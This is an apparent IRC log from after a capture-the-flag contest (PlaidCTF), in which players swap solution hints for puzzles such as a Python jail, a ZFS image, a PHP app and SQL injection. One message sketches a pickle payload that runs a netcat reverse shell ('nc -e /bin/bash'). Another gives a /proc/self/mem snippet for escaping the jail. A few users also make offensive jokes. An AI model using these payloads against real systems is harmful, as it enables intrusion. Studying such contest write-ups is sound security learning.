[01:26] <keidii> any ZFS solution other than brute ?
[01:26] == D3AdCa7_ [d220a27e@gateway/web/freenode/ip.210.32.162.126] has joined #pctf
[01:26] <+tylerni7> keidii: yes... but it was a pain
[01:26] <ryan-c> for steg, we just dicked around with setting all colors in the pallet except one to black
[01:26] == Valion_ [~Valion@c-75-70-225-60.hsd1.co.comcast.net] has quit [Ping timeout: 245 seconds]
[01:26] <ryan-c> and found an interesting range of pallet entries
[01:26] <inter> tylerni7: do you know who made tenement?
[01:26] <mak`> tylerni7: tell me
[01:26] <keidii> tylerni7 , i droped reading zfs src/doc after few hours
[01:26] <+tylerni7> inter: gbarboza
[01:27] <mak`> i spend a lot h on this
[01:27] == Rexperience7 [~Rex@unaffiliated/rexperience7] has joined #pctf
[01:27] == D3AdCa7 [d220a27e@gateway/web/freenode/ip.210.32.162.126] has quit [Ping timeout: 240 seconds]
[01:27] == someone_ [d1cb4e22@gateway/web/freenode/ip.209.203.78.34] has quit [Ping timeout: 240 seconds]
[01:27] <mak`> and got nothing at the end
[01:27] == dracu [~mata@89.157.34.48] has left #pctf []
[01:27] == sssssssss [5a9c5102@gateway/web/freenode/ip.90.156.81.2] has left #pctf []
[01:27] <Adran> i just randomized the colors and was able to make out all but the 'keep' part originally
[01:27] <pd7> what tool did you use to randomize the colors?
[01:28] <Adran> stegsolve
[01:28] <mak`> how one can find file if there is no data in dnode table?
[01:28] <pd7> thanks
[01:28] <ciliated> how to solve kpop?
[01:28] <mak`> ciliated: unserialize nad preg_replace
[01:28] <Adran> ciliated: http://paste2.org/Nn46z87k
[01:28] <abuss> anyone got a nightmare writeup?
[01:28] <mathiasbynens> clockish: nice! there must be a better way to find input groups for halphow2js rather than trial and error though
[01:28] <abuss> I heard you were supposed to write to /proc/self/mem but I got i/o err
[01:28] <clockish> abuss: write to /proc/self/mem
[01:28] <clockish> oh
[01:29] == erketu [~erketu@5.45.180.209] has quit [Read error: Connection reset by peer]
[01:29] <clockish> you have to write corectly
[01:29] <clockish> like, turn off buffering
[01:29] <abuss> oh hmm
[01:29] == Rinko [3d812a67@gateway/web/cgi-irc/kiwiirc.com/ip.61.129.42.103] has joined #pctf
[01:29] == mibbit_19028 [4a780f96@gateway/web/cgi-irc/kiwiirc.com/ip.74.120.15.150] has joined #pctf
[01:29] <Ymgve> what was the solution to freya?
[01:29] <mibbit_19028> solution to pwn 100?
[01:30] <clockish> mathiasbynens: heh, not really, just once you realize you can do it with small numbers you just play around
[01:30] <robbje> mak`: same here :>
[01:30] <Pitr_> tyler, what did i miss on curlcore?
[01:30] <inter> mserrano
[01:30] <inter> how did i
[01:30] <inter> misread
[01:30] <ryan-c> tylerni7: How's the reading interface on parlor built? Is it basically dependent on the nonce being in a single packet?
[01:30] <inter> 1 with l
[01:30] <mak`> robbje: you did it?
[01:30] <mathiasbynens> clockish: ok cool, thanks for confirming
[01:30] <inter> i still cant believe it
[01:30] <+tylerni7> ryan-c: dude I dunno
[01:30] <+tylerni7> it's just simple python
[01:30] <+tylerni7> I wrote it as simply as possible :P
[01:30] <robbje> mak`: no :(
[01:30] <foundation> Pitr_: what did you do on curlcore ?
[01:30] <mak`> tylerni7:
[01:30] == slipper [~slipper@202.120.36.140] has joined #pctf
[01:30] <Rexperience7> how to solve tenement
[01:30] <@mserrano> inter: :
[01:30] <robbje> i just wasted hours on it
[01:30] <@mserrano> (
[01:30] <ryan-c> tylerni7: You're just doing a socket read?
[01:30] <Pitr_> why was the memory layout in curlcores dump different from gnutls_int.h
[01:30] <robbje> Rexperience7: google egghunter
[01:30] == lkwpeter1 [~florian@studpool-wlan-74-78.fs.fbi.h-da.de] has quit [Ping timeout: 276 seconds]
[01:30] <+tylerni7> ryan-c: yeah
[01:31] <Sin__> Rexperience7, just dump the whole memory and do strings
[01:31] <foundation> i dumped the heap and searched for somethign resembleing the client random , first part you can take from ssl packet
[01:31] <+tylerni7> if it's multiple packets it might get sad (as in it'd just read the first one)
[01:31] <Rexperience7> oh
[01:31] <Rexperience7> EGGHUNTER
[01:31] <[pwn]Idolf> FUCKING HELL
[01:31] <Rexperience7> OHHHHHHH
[01:31] <+dickoff> Streaming question, do people care about the video part of plaidTV or just the music
[01:31] <[pwn]Idolf> We got code exec on the python jail now
[01:31] <[pwn]Idolf> 28 minutes too late
[01:31] <inter> dickoff: you should stream
[01:31] <Pitr_> foundation: i checked the order in the geaderfile
[01:31] <inter> of yo uguys
[01:31] <Sin__> what plaidtv ?
[01:31] <[pwn]Idolf> what was the intended solution?
[01:31] <inter> suffereing from 502 erros
[01:31] <mathiasbynens> [pwn]Idolf: what’s your exploit look like?
[01:31] <ryan-c> tylerni7: yeah, it didn't work when i tried to send stuff through netcat which breaks into packets by line.
[01:31] <mak`> dickoff: both
[01:31] <+ricky> Sin__: It's a video/audio stream dickoff did last year
[01:31] <@mserrano> [pwn]Idolf: use /proc/self/mem to overwrite a function pointer
[01:32] <robbje> mserrano: i think we solved it differently :)
[01:32] <muchacho> mserrano, how do you call "someshit"-file ?
[01:32] <ryan-c> tylerni7: worked when i used python and socket.sent
[01:32] <ryan-c> er
[01:32] <Sin__> like at the defcon quals? that would've been nice
[01:32] <ryan-c> send
[01:32] <+tylerni7> ryan-c: yeah
[01:32] <@mserrano> robbje: did you guys use a code object?
[01:32] <sven> so, i'm curious, how was zfs supposed to be solved?
[01:32] <[pwn]Idolf> mserrano: wtf, can you write using /proc/self/mem?
[01:32] <[pwn]Idolf> We tried that :/
[01:32] <+tylerni7> sven: zfs stuff...
[01:32] <robbje> mserrano: i think so
[01:32] <robbje> the exploit is huge and ugly :>
[01:32] <geobot> its ugly though
[01:32] <abuss> dickoff, did I miss a link to plaidtv?
[01:32] <+tylerni7> sven: frozencemetery and awreece know how
[01:32] <@mserrano> [pwn]Idolf: yeah, you have to set the modes correctly and shit
[01:32] <ryan-c> also fuck debugging endienness issues
[01:32] <abuss> 48 hours ago? :P
[01:33] <@mserrano> robbje: :) that's how clockish did it
[01:33] <+dickoff> abuss: I didn't do it this year
[01:33] <abuss> ah k
[01:33] <[pwn]Idolf> mserrano: ..... open("/proc/self/exe", "w")?
[01:33] == nUl1 [5d9dadb6@gateway/web/freenode/ip.93.157.173.182] has quit [Quit: Page closed]
[01:33] <@mserrano> open("/proc/self/maps", "r+b")
[01:33] <clockish> robbje: you used a code object? <3
[01:33] <@mserrano> you also have to set buffering to zero or something
[01:33] == whois [ZISN2.9@183.91.226.83] has quit [Quit: Http://www.ZeroIRC.NET ¢Æ Zero IRC ¢Æ Ver 2.9]
[01:33] <robbje> clockish: spq did it, yeah
[01:33] <abuss> ahhh
[01:33] <[pwn]Idolf> mserrano: what-the-shit.... that's not at ALL how we solved it :D
[01:33] == DKay [uid11914@gateway/web/irccloud.com/x-pslnfvcgkqlkagfl] has quit [Quit: Connection closed for inactivity]
[01:34] <clockish> [pwn]Idolf: what did you do?
[01:34] <[pwn]Idolf> mserrano: I'm considering sharing the exploit, but that would ruin a CTF-problem I'm designing :P
[01:34] <geobot> priv escalation vulnerabilities ruin it all
[01:34] == Pause [~PauseSave@ip68-98-14-13.ph.ph.cox.net] has joined #pctf
[01:34] <@mserrano> [pwn]Idolf: lol
[01:34] <+tylerni7> [pwn]Idolf: awww
[01:34] <@mserrano> I thought we would finally kill python jails
[01:34] <abuss> I was reading all the /proc/self/ stuff but only tried to write to mem
[01:34] <+tylerni7> [pwn]Idolf: just share it with us then ;)
[01:34] <@mserrano> with last year and this year
[01:34] <+dickoff> inter: mak` I'll bring it back in some fashion next year
[01:34] == morgan_z [~morgan@dyna6-61.cs.uoregon.edu] has joined #pctf
[01:35] <+dickoff> doing videos is way more annoying than music
[01:35] <[pwn]Idolf> mserrano: well, I guess your solution is more general... but WHAT IF WE DIDN'T EVEN HAVE STDOUT?!? :D
[01:35] <muchacho> mserrano, how do you call "someshit"-file in kpop? What is the path?
[01:35] <Pitr_> we need more perl chals
[01:35] == PauseSave [~PauseSave@ip68-98-14-13.ph.ph.cox.net] has quit [Ping timeout: 245 seconds]
[01:35] <@mserrano> muchacho: you don't need to call a file
[01:35] == c1l0 [~c1l0@c-98-248-187-55.hsd1.ca.comcast.net] has quit [Ping timeout: 276 seconds]
[01:35] <+tylerni7> Pitr_: that can be arranged
[01:35] <sven> i want more non-x86 pwnables
[01:35] <clockish> [pwn]Idolf: I for one am super curious what you did :)
[01:35] <robbje> ban Pitr_
[01:35] <asmoday> IPV6
[01:35] <Tapyroe__> any one want to briefly tell me how to solve mt pox? XD
[01:35] <robbje> :>
[01:35] <@mserrano> muchacho: in fact it doesn't successfully write to that file
[01:35] <+tylerni7> sven: we'll see... that requires not EC2 for hosting
[01:35] <Pitr_> great!
[01:35] <abuss> oh I also wanted to say that I liked reekeeee
[01:35] <jix> or nen x86 reversing
[01:35] <sven> tylerni7: qemu on ec2 should work :)
[01:35] <abuss> it felt like a really solid web problem
[01:35] <@mserrano> muchacho: instead it uses preg_replace("/stuff/e", "phpcode()")
[01:36] <clockish> [pwn]Idolf: Given that I wrote the chall and couldn't find any other holes...
[01:36] <+tylerni7> sven: well.. qemu isn't the best
[01:36] Pitr_ trapt robbje in zijn ballen :D
[01:36] <Sin__> Tapyroe__, hash length extension
[01:36] <hammerpig> many thanks for ctf
[01:36] == hammerpig [~user@gateway/tor-sasl/hammerpig] has quit [Quit: leaving]
[01:36] <sven> tylerni7: ah, fair enough. it probably requires quite some cpu power if all people are trying to pwn it at the same time
[01:36] <mibbit_19028> tiffany was a pain all that antidebugging!
[01:36] == alex___ [b2c22e8b@gateway/web/freenode/ip.178.194.46.139] has joined #pctf
[01:36] <+tylerni7> also annoying qemu bugs sometimes crop up
[01:36] <[pwn]Idolf> clockish: ok, sure... I'll upload it not
[01:36] <muchacho> mserrano, ah k damnit, thx!
[01:37] <Tapyroe__> Sin__: thanks!
[01:37] <Pitr_> & thanks again, see you next year!
[01:37] <@mserrano> [pwn]Idolf: ok, so you used a code object
[01:37] <@mserrano> ok
[01:38] <inter> tylerni7 so what was the solution to rsa?
[01:38] <clockish> [pwn]Idolf: oh, a code object. Yeah, that was another way to do it.
[01:38] <inter> i had a chunk of code for it
[01:38] <inter> but didnt work
[01:38] <@mserrano> inter: there's a paper
[01:38] <@mserrano> they have a description of an algorithm
[01:38] <clockish> [pwn]Idolf: good work!
[01:38] <@mserrano> either find an implementation or write one
[01:38] <@mserrano> obtain flag
[01:38] <+tylerni7> inter: well... I wrote code from scratch... there is source that mostly works online though :(
[01:38] <+tylerni7> that I didn't know about (:
[01:38] <inter> r
[01:38] <inter> o
[01:38] <inter> f
[01:38] <+tylerni7> :(*
[01:38] <inter> l
[01:38] == makler2004 [~chatzilla@adhg69.neoplus.adsl.tpnet.pl] has quit [Quit: ChatZilla 0.9.90.1 [Firefox 28.0/20140314220517]]
[01:38] <inter> aint nobody got time fo dat
[01:38] <inter> jk
[01:38] <inter> i sometimes wish i was black female
[01:38] <inter> so i can say that
[01:39] <inter> no racism
[01:39] == Zibro [~zibro@tu132135.ip.tsinghua.edu.cn] has joined #pctf
[01:39] <clockish> [pwn]Idolf: code obj is the more leet way to do it :)
[01:39] <[pwn]Idolf> clockish: /proc/self/mem was one of the first things I tried :/
[01:40] <clockish> [pwn]Idolf: yeah, I thought more people would use proc/self/mem because it is easier.
[01:40] <inter> clockish: your challs require too much creativity
[01:40] <clockish> inter: :D
[01:40] <inter> its too much for non-cs major kid
[01:40] <inter> :/
[01:40] == Hertle [~Hertle@host74-2.natpool.mwn.de] has quit [Ping timeout: 245 seconds]
[01:40] <clockish> [pwn]Idolf: yeah, you need f = file('/proc/self/mem', 'r+b', 0); f.seek(i); x=f.read(l) to make it work
[01:40] <abuss> 0 for unbuffered?
[01:41] <clockish> abuss: yes
[01:41] <[pwn]Idolf> clockish: when it didn't work initially, I found somewhere on the web that said you apparently couldn't do it :/
[01:41] <jjk_> to the zfs - i constructed a new uberblock pointing to newer blocks and used ufs explorer to extract the data (as it ignores the checksums)
[01:41] <@mserrano> it depends on your system :(
[01:41] <clockish> [pwn]Idolf: :/
[01:41] <[pwn]Idolf> I tried "rwb"
[01:41] <@mserrano> jjk_: that was the intended solution :)
[01:41] <+dickoff> so how big of a party is 0xffa throwing?! _blasty_, ius, iZsh, etc
[01:41] == mibbit_19028 [4a780f96@gateway/web/cgi-irc/kiwiirc.com/ip.74.120.15.150] has quit [Quit: mibbit_19028]
[01:41] <clockish> [pwn]Idolf: yeah, it works on every machine I've tried it on, except for mserrano's :P
[01:41] == random_user_23 [5d6846fd@gateway/web/freenode/ip.93.104.70.253] has quit [Quit: Page closed]
[01:42] <@mserrano> yeah it fails on my droplet
[01:42] <[int3]romansoft> jjk_: can you elaborate on that? (zfs)
[01:42] == mode/#pctf [+v clockish] by mserrano
[01:42] == mode/#pctf [-o mserrano] by mserrano
[01:42] <jjk_> mserrano: it took me a while to notice the uber-corruption in challenge description :)
[01:43] == Pause [~PauseSave@ip68-98-14-13.ph.ph.cox.net] has quit []
[01:43] <mak`> jjk_: im zfs n00b could you elaborate?
[01:43] <poppopret> anyone got a g++ writeup?
[01:43] <+tylerni7> poppopret: well
[01:43] <+cai_> thanks for leaving feedback. they greatly help us to improve pctf every year :)
[01:43] <+tylerni7> basically it does matrix multiplication on your key over gf(257)
[01:43] <+cai_> if you haven't done it yet, please take our survey:  http://bit.ly/1ifQBOo
[01:43] <+dickoff> ^^^
[01:43] <mak`> i was trying to find metadata like here: http://www.joyent.com/blog/zfs-forensics-recovering-files-from-a-destroyed-zpool
[01:43] <+tylerni7> poppopret: not quite a writeup, but yeah that's how it verified your key
[01:43] <inter> anyways
[01:44] <mak`> but find only zap with file names and id
[01:44] <inter> i has my writeup in very very short point form
[01:44] <mak`> and there was no data in dnode tables
[01:44] <mak`> at this id
[01:44] <jjk_> i can recommend ondiskformat.pdf for zfs structure
[01:44] <poppopret> ahhh
[01:44] <poppopret> ok
[01:44] <inter> gg is gay
[01:44] <poppopret> thanks tyler
[01:44] == sibios [~sibios@unaffiliated/sibios] has quit [Quit: Leaving]
[01:44] <+clockish> poppopret: some people (incl me!) solved it by making the C++ more readable, and then noticing the key can be brute forced 4 bytes at a time.
[01:44] <+tylerni7> poppopret: I'm sure someone will post a better writeup for it
[01:44] <mak`> yeah was reading it
[01:44] == c1l0 [~c1l0@c-98-248-187-55.hsd1.ca.comcast.net] has joined #pctf
[01:44] <irctc736> anyone has a writeup on bronies?
[01:44] <foundation> tylerni7: please tell me you didn't write that by hand
[01:45] <Sin__> clockish, was there a better way ?
[01:45] <+tylerni7> foundation: I... did
[01:45] == AnthraX101 [~asdf@23-25-135-9.seattle.securityinnovation.com] has quit []
[01:45] <+tylerni7> iteratively, but by hand
[01:45] <inter> clockish: yep 4 bytes a type
[01:45] <+cai_> we'll soon make a page that lists all the write-ups submitted to us (via email or dropped in IRC)
[01:45] <+clockish> Sin__: for g++? yeah, read the code and understand that it's GF(207)
[01:45] <+clockish> But math is hard.
[01:45] <jjk_> mak`, [int3]romansoft and here is my ugly python code to find uberblocks - http://pastebin.com/Y14B2RAh
[01:45] <inter> pos 0,4,8,12
[01:45] <Sin__> it is
[01:45] <inter> but then
[01:45] <jmgrosen> so, how do you do bronies part 1? that's been bothering me
[01:45] <poppopret> where do we submit writeups to?
[01:45] <inter> i misread
[01:45] <inter> 1 as l
[01:45] <inter> or
[01:45] <sven> "see suspicious file name, figure out it's two files XOR'ed together, find out a suspicious block just before the file name, xor that with whole file, strings. profit"<-- how aDR4eA solved zfs :)
[01:45] <inter> l as 1
[01:45] <inter> and lost the breakthru
[01:45] <inter> fuckkk
[01:45] <+clockish> Sin__: So i'd say brute force is actually the better solution :P
[01:45] <jjk_> and the missing blocks
[01:45] <shabgrd> I think half the world solved crypto 20 expect for me :(
[01:46] <[int3]romansoft> cai_: for next year, a simple board that lets up read the problems and send the flags. No more is needed.
[01:46] <geobot> oo i like skier_ too late to make friends at the ai is littered with you have a lot of simple binaries(no arm, x86-32)
[01:46] <poppopret> where do we submit writeups to?
[01:46] <+tylerni7> [int3]romansoft: it's what happens when we try to innovate :(
[01:46] <abuss> Hmm I liked the fancy board and the voting mechanics
[01:46] <+clockish> poppopret: nothing PPP official, but there's a CTFs writeups github that aggregates writeups
[01:46] <poppopret> ok
[01:46] <[pwn]Idolf> clockish: the main reason our exploit didn't work? We had a '|' instead of a 'd'
[01:46] <phiber__> innovating is fine, but please have a fallback simple interface
[01:46] <abuss> it worked surprisingly well across my devices
[01:46] <+cai_> [int3]romansoft: you might actually get that. i'm quitting after this one is wrapped up.
[01:46] <+mserrano> [pwn]Idolf: awwwwww
[01:47] <+tylerni7> poppopret: if you put them in here we'll try to keep up with them
[01:47] == alex___ [b2c22e8b@gateway/web/freenode/ip.178.194.46.139] has quit [Ping timeout: 240 seconds]
[01:47] <[pwn]Idolf> mserrano: ok, I'll stop whining now and go to bed :P
[01:47] <+tylerni7> cai_: <3
[01:47] <+tylerni7> :(
[01:47] <phiber__> I didn't know you could switch the board to see more problems until 8h passed
[01:47] <upb> abuss: "This is the form of a signed, timestamped data cookie. The period at the beginning of the string indicates that the cookie is zlib-compressed, " <- Is that standard for some framework or?
[01:47] == deject3d [~deject3d@205.204.16.136] has joined #pctf
[01:47] <+tylerni7> upb: yeah, standard for django
[01:48] <upb> ah
[01:48] <+tylerni7> maybe more as well
[01:48] <abuss> upb, I had just spent a while on reekeee
[01:48] <abuss> which was very similar
[01:48] <phiber__> the mourse cursor doesn't change when hovering over any clickable thing
[01:48] <deject3d> what was the solution to reekee anyway
[01:48] <jmgrosen> anyone have a writeup of part 1 of bronies up yet?
[01:48] <deject3d> or at least where was the flag
[01:48] <iago-x86> I just realized I haven't eaten today :)
[01:48] <Dumplinghttps://github.com/isislab/CTF-Solutions/tree/master/PCTF_2014 <- solutions for mtpox, kpop, and kappa
[01:48] <abuss> deject3d, after getting the secrets.py
[01:48] <abuss> you can forge cookies
[01:48] == zTrix_ [~zTrix@2402:f000:d:8001:2969:4da7:2b93:32a0] has quit [Quit: WeeChat 0.4.3]
[01:48] <LuckyY> phiber__: +1
[01:48] <abuss> it took me a while to get it to work
[01:48] <deject3d> yeah i never got my cookies to work
[01:48] <abuss> cause I didn't notice django had their own b64_decode that tweaked padding
[01:49] <deject3d> humph
[01:49] <deject3d> i tried for so long to get a cookie to work
[01:49] <deject3d> oh well
[01:49] <abuss> then you assemble a pickle that calls os.system('nc -e /bin/bash/ server port')
[01:49] == phiber [~bleh@182.Red-79-144-123.dynamicIP.rima-tde.net] has joined #pctf
[01:49] == chrissing [~nullProte@pool-71-191-221-210.washdc.fios.verizon.net] has quit [Remote host closed the connection]
[01:49] <abuss> and use the shell to run a program on a file that spits the key
[01:49] <geobot> sweet, i'm finally getting out about ctf and change it in donald glover, it spits out that some of us are going to open source code for about pony porn warez
[01:49] <phiber> the mourse cursor doesn't change when hovering over any clickable thing
[01:49] <deject3d> ah damn
[01:49] <phiber> so it was really hard to notice the board was interactive
[01:50] <abuss> agree with phiber, changing the mouse cursor when over something clickable would have been nice
[01:51] <+awesie> phiber abuss: i agree, forgot about that; UX is hard when you are the designer / developer / tester
[01:51] <mischa__> whatscat writeups available?
[01:51] <[CISSP]HoLyVieR> mscha__: check the reset password feature
[01:51] <[CISSP]HoLyVieR> mischa__: there's a SQLi in there
[01:52] <Dumpling> sqli via your rdns?
[01:52] == ijonas [534e453a@gateway/web/freenode/ip.83.78.69.58] has joined #pctf
[01:52] <[CISSP]HoLyVieR> no the username
[01:52] <Sin__> via username
[01:52] <phiber> I did sqli via rdns records
[01:52] == phiber__ [~bleh@79.146.84.198] has quit [Ping timeout: 252 seconds]
[01:52] <tsuro> damn, we did it via rdns :)
[01:52] <+tylerni7> rdns was probably easier
[01:52] <phiber> much easier than blind sqli on username
[01:52] <+tylerni7> yeah
[01:52] <xp45g> via rdns O_o
[01:52] <mischa__> we had a sqli in our TXT record
[01:52] <abuss> phiber, huh that's cool
[01:53] <[CISSP]HoLyVieR> username was a pain to exploit tough 64 caracters limit :/
[01:53] <abuss> which provider lets you screw with rdns like that?
[01:53] <fester> he.net
[01:53] <xp45g> i used username to test one flag char at a time
[01:53] <abuss> ah
[01:53] == Stean [~Stean@hlab.informatik.uni-mannheim.de] has quit [Quit: Leaving.]
[01:53] <xp45g> if test was successful the query would reset pass for my 2nd account
[01:53] <KT> btw who is 0xffa?
[01:53] == [pwn]Idolf [~idolf@fw-alt2.math.ku.dk] has quit [Ping timeout: 240 seconds]
[01:53] <fester> actually, you just need a rdns to point to a valid dns, it looks up all records of the dns entry (even txt)
[01:54] <phiber> abuss, your provider usually only lets you change the rdns entry
[01:54] <+mserrano> KT: eindbazen + fail0verflow
[01:54] == ltfish [~Fish@128.111.48.6] has quit [Ping timeout: 240 seconds]
[01:54] <phiber> so you point that to a host you control
[01:54] == skuu [~thesku@77-57-2-114.dclient.hispeed.ch] has joined #pctf
[01:54] <phiber> and a dns server you control
[01:54] <KT> mserrano: oh, i see, thx
[01:54] <Guest17539> is there any writeup for hudak?
[01:54] == _simo [~simo@41.251.135.62] has quit [Quit: segfault at 7fff1ebe5000 ip 000000000041274b sp 00007fff1ebe32f8 error 6]
[01:54] <inter> looking for solutions to tenement
[01:55] <iZsh> tylerni7: there is an easier way for curlcore
[01:55] == Saxophie [~sophie@ip-83-134-206-91.dsl.scarlet.be] has quit [Quit: WeeChat 0.3.7]
[01:55] == [pwn]poizan42 [~poizan@fw-alt2.math.ku.dk] has quit [Ping timeout: 258 seconds]
[01:55] <+tylerni7> iZsh: how'd you do it?
[01:55] <iZsh> tylerni7: you get the sessionID from wireshark, you search for this, and the masterkey is just before that key, then you feed that to wireshark and that's it
[01:55] <fester> i asked my provider to change my rdns txt entry and they marked my vps as 'High Risk'
[01:55] <Reinhart> mserrano: we ended up solving it using the slide attack, but also had a brute forcer running that ended up finding the flag while I was sleeping
[01:56] <ciliated> how to solve doge_stage?
[01:56] <+tylerni7> iZsh: ah, interesting
[01:56] <iZsh> tylerni7: that's why it took like a few minutes to solve :)
[01:56] == ___Sin [~R@89.136.137.72] has joined #pctf
[01:56] <plaintext> we solved doge by sorting the palette by number of pixels that have that color
[01:56] <plaintext> and changing the top N to black
[01:56] <+clockish> ciliated: one way is to randomize the palate colors
[01:56] <+mserrano> Reinhart: hehe
[01:56] <plaintext> the key starts appearing
[01:56] <+clockish> plaintext: yep
[01:56] <corpille> gimp -> map ;)
[01:56] <[CISSP]HoLyVieR> at 127 to 208
[01:56] <+mserrano> next time I will make the blocks bigger
[01:56] <+mserrano> so that that doesn't work
[01:56] <ciliated> thanks
[01:56] <inter> real
[01:56] <inter> [14:52] <+mserrano> next time I will make the blocks bigger
[01:57] <D3AdCa7_> I solve doge by divide that image into two...
[01:57] <+mserrano> inter: 3 bytes is not that many bytes
[01:57] <inter> you could have 1
[01:57] <[CISSP]HoLyVieR> change the color of palette from 127 to 208 to black and rest white and it gives the text
[01:57] <abuss> were there any solutions to halpjs that didn't involve string tricks?
[01:57] == bool_101 [~bool@c-67-163-29-185.hsd1.in.comcast.net] has joined #pctf
[01:57] <+mserrano> abuss: not afaik
[01:57] <abuss> more to the point, were there any x besides 1 and 6 such that mystop(x) == x?
[01:57] <Rinko> a random shuffle on the palette works well though
[01:58] <abuss> ah
[01:58] <plaintext> it's impossibru without string ticks
[01:58] <inter> o
[01:58] <inter> btw
[01:58] <plaintext> you need 3 different values map to themselves
[01:58] <inter> mserrano,
[01:58] <inter> how did you guys
[01:58] <abuss> okay that's a bit comforting then :P
[01:58] <inter> manage to fix the server load
[01:58] <inter> in the early stage of ctf?
[01:58] <+mserrano> inter: I honestly have no idea
[01:58] <inter> im more interested in that
[01:58] <Reinhart> mserrano: this solved it purely by bruteforce in ~6hrs or so https://p.6core.net/p/hoVp1HHotIIKVpVBTyL1xRJ8
[01:58] == bool101 [~bool@c-67-163-29-185.hsd1.in.comcast.net] has quit [Ping timeout: 245 seconds]
[01:58] <+mserrano> the relevant people worked magic the way they always do
[01:58] <phiber> crypto parlor was hash length extension right?
[01:58] == albntomat0 [8c201003@gateway/web/freenode/ip.140.32.16.3] has joined #pctf
[01:59] <+mserrano> phiber: yes
[01:59] <+tylerni7> inter: cai_ and awesie worked their magic
[01:59] <Tapyroe__> Reinhart: which problem was that for?
[01:59] <jmgrosen> Dumpling: did you write those write-ups?
[01:59] <inter> OHH
[01:59] <phiber> I didn't have enough time to code everything
[01:59] <Dumpling> jmgrosen: two out of the three
[01:59] <+mserrano> yeah
[01:59] <+mserrano> there's like some rule of the universe that says that everything must go wrong on friday at 5 pm
[01:59] <jmgrosen> Dumpling: could you explain kpop? I don't get how the system() call is getting eval'd
[02:00] <+mserrano> and then magic happens and it eventually gets fixed
[02:00] <deject3d> where was the flag for whatscat? was it in the database?
[02:00] == Sin__ [~R@78.96.111.132] has quit [Ping timeout: 240 seconds]
[02:00] <+awesie> inter: tl;dr once caching was working correctly and the wsgi servers stopped acting weird, load was less of an issue
[02:00] <Reinhart> Tapyroe__: wheeee
[02:00] <phiber> also I got up to $64K playing manually lol
[02:00] <+cai_> inter: awesie will post some notes on that on our blog
[02:00] <Dumpling> jmgrosen: preg_replace has a /e flag for dynamic replacements and stuff, it basically evals code
[02:00] <corpille> what was tenement ?
[02:00] <robbje> corpille: egghunting shellcode
[02:00] <jmgrosen> Dumpling: ........wow, that's pretty ridiculous o_O
[02:00] <Reinhart> Tapyroe__: but as I said, we solved it using the slide attack before this brute forcer finished
[02:00] jmgrosen reminds himself never to use php
[02:00] <abuss> I was going to script parlor to keep betting the farm on 2^20 odds, which would've required 500,000 requests or so
[02:01] <Tapyroe__> ah right, Reinhart! thanks :) dont think I even tried wheeee
[02:01] <corpille> egghunting shellcode mmm ... okay :)
[02:01] <abuss> it was going too slowly, but did anyone else manage that?
[02:01] == lkwpeter [~florian@p5DDCCDB7.dip0.t-ipconnect.de] has joined #pctf
[02:01] <deject3d> whatscat was a sql injection but was the flag stored in a file? were file perms on or anything?
[02:01] == irctc736 [806f3006@gateway/web/freenode/ip.128.111.48.6] has quit [Ping timeout: 240 seconds]
[02:01] == lkwpeter [~florian@p5DDCCDB7.dip0.t-ipconnect.de] has quit [Client Quit]
[02:02] <[CISSP]HoLyVieR> deject3d: I heard it was in "flag" table
[02:02] <geobot> his dinner table x|
[02:02] <xp45g> deject3d: flag was in the db
[02:02] <spq> hm, i didnt know we can still write into /dev/mem (for python jail) solved it completely within python (python function opcodes -> libc system("/bin/sh") )
[02:03] <abuss> NICE
[02:03] <Dumpling> spq: got a writeup for that?
[02:03] <inter> does any of you know solutions to curlcore?
[02:03] <iZsh> hijacking the support email is a nice way to get hints ;-)
[02:03] <deject3d> anyone have a brony writeup?
[02:03] <spq> Dumpling: not ready :D
[02:03] <Rinko> btw does "hudak" refers to Paul Hudak? closure and lazy evaluation everywhere in this problem
[02:03] <phiber> I tried replacing function bytecode, but if I replaced it with something that imported os it failed
[02:03] <+mserrano> Rinko: yes.
[02:03] <plaintext> yep
[02:03] <___Sin> iZsh, that's so nasty
[02:04] <plaintext> we only figured out that hint in the end
[02:04] <phiber> anyone did it that way?
[02:04] <+mserrano> phiber: we held an import lock
[02:04] <plaintext> hudak was a nice task btw
[02:04] <+mserrano> phiber: so you couldn't import anyway
[02:04] <inter> phiber: acquire_lock()
[02:04] <phiber> oh
[02:04] <inter> but
[02:04] <inter> does anyone know solutions to curlcore?
[02:04] <iZsh> inter: yes
[02:04] <inter> iZsh: may i pm you :D
[02:04] <+mserrano> inter: find the aes keys, decrypt the traffic, get flag
[02:05] <inter> well
[02:05] <iZsh> mserrano: easier way :)
[02:05] <inter> i looked for
[02:05] <inter> temporary ssl keys
[02:05] <inter> in corefile
[02:05] <phiber> I also thought about writing to /self/mem but I was too busy on other challenges
[02:05] == ciliated [99bd4541@gateway/web/freenode/ip.153.189.69.65] has quit [Quit: Page closed]
[02:05] == phreeek [~magnus@adversec.com] has joined #pctf
[02:05] == obvi0us [~chatzilla@194.88.183.217] has quit [Remote host closed the connection]
[02:05] <inter> but i didnt find any patterns
[02:05] <inter> what was the methods to find the aes key in the corefile?
[02:05] <phiber> there were too many challenges
[02:05] <iZsh> inter: you can open it in wireshark, look at the SessionID, search for it in a hex editor in the dump, just before that, you'll have the size of the sessionid, and then before that, the masterkey
[02:05] <geobot> and the masterkey is just before
[02:05] <inter> open corefile?
[02:06] <phreeek> mserrano: one question to kpop, I got only a 500 error with your payload
[02:06] <inter> oh
[02:06] <inter> nvm
[02:06] <inter> OHH
[02:06] <inter> okay
[02:06] <iZsh> inter: then you write a file called key.txt which contains the sessionid and the masterkey and you can feed that to wireshark for decryption
[02:06] <inter> wow
[02:06] <inter> damn
[02:06] <inter> it feels like a hammer just slammed my face to the floor
[02:07] <inter> thanks iZsh :D
[02:07] <iZsh> that one was fast to solve :)
[02:07] <inter> well
[02:07] <inter> my brain was already tortured by misc250 and pyjail
[02:07] <inter> n0sleep.tv
[02:07] <plaintext> damn, who handles the Plaid twitter acc?
[02:07] <plaintext> i made a mistake with my writeup :8
[02:07] <foundationhttp://pastebin.com/3Kw2HZjP patch for tor for rendezvous
[02:07] <inter> yeah
[02:07] <inter> i knew
[02:07] <inter> what i wanted to do
[02:08] <inter> but i couldnt find the function get_node_by_name or something
[02:08] <inter> i tried hardcoding to fill out the structs
[02:08] <inter> but i failed LOL
[02:08] <dwn> how were we suppsoed to guess there was a flags table in whatscat ;_;
[02:08] <foundation> took a while
[02:08] <dwn> also that box has the slowest updating dns cache
[02:09] == Beched [6daa088b@gateway/web/freenode/ip.109.170.8.139] has quit [Ping timeout: 240 seconds]
[02:09] <inter> at least i learned 2 things today
[02:09] <inter> 1. dont eat overnight chinese food
